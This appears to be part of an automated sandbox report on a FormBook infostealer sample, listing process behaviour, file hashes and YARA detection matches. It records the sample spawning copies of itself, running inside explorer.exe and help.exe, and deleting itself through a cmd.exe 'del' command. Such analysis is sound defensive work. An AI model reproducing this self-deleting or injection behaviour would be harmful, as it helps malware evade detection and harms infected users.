                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                  Code Manipulations

                                                                  Statistics

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Start time:10:02:28
                                                                  Start date:12/04/2021
                                                                  Path:C:\Users\user\Desktop\s6G3ZtvHZg.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\s6G3ZtvHZg.exe'
                                                                  Imagebase:0x460000
                                                                  File size:893952 bytes
                                                                  MD5 hash:885E567660A28EC23B692291587EF69F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  General

                                                                  Start time:10:02:34
                                                                  Start date:12/04/2021
                                                                  Path:C:\Users\user\Desktop\s6G3ZtvHZg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Users\user\Desktop\s6G3ZtvHZg.exe
                                                                  Imagebase:0x3f0000
                                                                  File size:893952 bytes
                                                                  MD5 hash:885E567660A28EC23B692291587EF69F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  General

                                                                  Start time:10:02:35
                                                                  Start date:12/04/2021
                                                                  Path:C:\Users\user\Desktop\s6G3ZtvHZg.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\Desktop\s6G3ZtvHZg.exe
                                                                  Imagebase:0xbc0000
                                                                  File size:893952 bytes
                                                                  MD5 hash:885E567660A28EC23B692291587EF69F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  General

                                                                  Start time:10:02:38
                                                                  Start date:12/04/2021
                                                                  Path:C:\Windows\explorer.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:
                                                                  Imagebase:0x7ff662bf0000
                                                                  File size:3933184 bytes
                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:10:02:52
                                                                  Start date:12/04/2021
                                                                  Path:C:\Windows\SysWOW64\help.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\help.exe
                                                                  Imagebase:0xbf0000
                                                                  File size:10240 bytes
                                                                  MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:moderate

                                                                  General

                                                                  Start time:10:02:57
                                                                  Start date:12/04/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:/c del 'C:\Users\user\Desktop\s6G3ZtvHZg.exe'
                                                                  Imagebase:0x370000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:10:02:57
                                                                  Start date:12/04/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff774ee0000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Reset < >